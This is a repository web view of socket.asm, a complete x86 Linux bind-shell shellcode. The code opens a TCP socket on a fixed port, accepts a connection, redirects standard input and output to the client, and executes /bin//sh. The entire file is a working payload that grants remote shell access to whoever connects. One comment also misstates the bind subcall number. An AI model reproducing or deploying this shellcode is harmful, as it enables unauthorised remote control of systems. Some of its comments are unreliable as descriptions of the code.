aboutsummaryrefslogtreecommitdiff
path: root/shellcode/socket.asm
blob: 3c9d2e925ab60d904f731c20b73e929e6409ab71 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
BITS 32


add     esp,64      ; keep some bytes between code<->stack
; socket()
xor		eax,eax		; zero out eax
xor		ebx,ebx		;   "   "  ebx
push		eax		; push 0x0 on the stack: arg3(protocol) -> 0
mov		bl,0x1		; socket sub-syscall: 0x1 -> socket()
push		ebx		; socket type: 0x1 -> SOCK_STREAM
push		0x2		; socket domain: 0x2 -> AF_INET
mov		ecx,esp		; let ecx point to our structure above
mov		al,0x66		; socketcall syscall 0x66
int		0x80		; let the kernel do the stuff

; bind()
mov		edx,eax		; move socket descriptor (returned by socket()) to edx
xor		eax,eax
; sockaddr_in
push		eax		; sockaddr_in: in_addr = 0
push word	0x11AA		; sockaddr_in: tcp port 
push word 	0x2		; sockaddr_in: sa_family -> AF_INET = 0x2
mov		ecx,esp		; save stack pointer -> pointer to sockaddr struct
push		0x10		; arg3: socklen -> addrlen
push		ecx		; arg2: push pointer to sockaddr to the stack
push		edx		; arg1: push sockfd
; arg2
mov		ecx,esp		; move stack pointer to reg (conform to socketcall)
; arg1
xor		ebx,ebx
mov		bl,0x2		; set socket subcall to 0x03 (bind)
mov		al,0x66		; socketcall syscall
int		0x80		; let the kernel do the stuff

; listen()
xor		eax,eax
push		eax		; backlog
push		edx		; sockfd
mov		ecx,esp		; save stackptr
mov		al,0x66		; socketcall()
xor		ebx,ebx
mov		bl,0x4		; socketcall 0x4 -> listen()
int		0x80		; kernel mode

; accept()
xor		eax,eax
push		eax		; sockaddr: in_addr = 0
push word	ax		; sockaddr: tcp port = 0
push word	0x2		; sockaddr: sa_family -> AF_INET
mov		ecx,esp		; save stack pointer
push		0x10		; addrlen
push		esp		; pointer to sock addrlen
push 		ecx		; push sockaddr_in
push		edx		; sockfd
mov		ecx,esp
xor		ebx,ebx
mov		bl,0x5
mov		al,0x66
int		0x80

; dup2()
xor		ecx,ecx		; zero out count register
mov		cl,0x3		; loopcount
mov		ebx,eax		; sockfd of the client (see accept())
dupes:
xor		eax,eax		; zero out eax
mov		al,63		; dup2() syscall
dec		cl
int		0x80
inc		cl
loop		dupes		; jump2label

; exec()
xor		eax,eax
xor		ecx,ecx
cdq
push		0x68732f6e	; 'hs/n'
push		0x69622f2f	; 'ib//'
mov		ebx,esp		; arg
mov byte	[esp + 8], al	; null-terminate the string
mov		al,0xb		; execve syscall
int		0x80

; exit()
mov		al,0x1		; exit syscall
xor		ebx,ebx
mov		bl,0x42		; return code
int		0x80		; kernel mode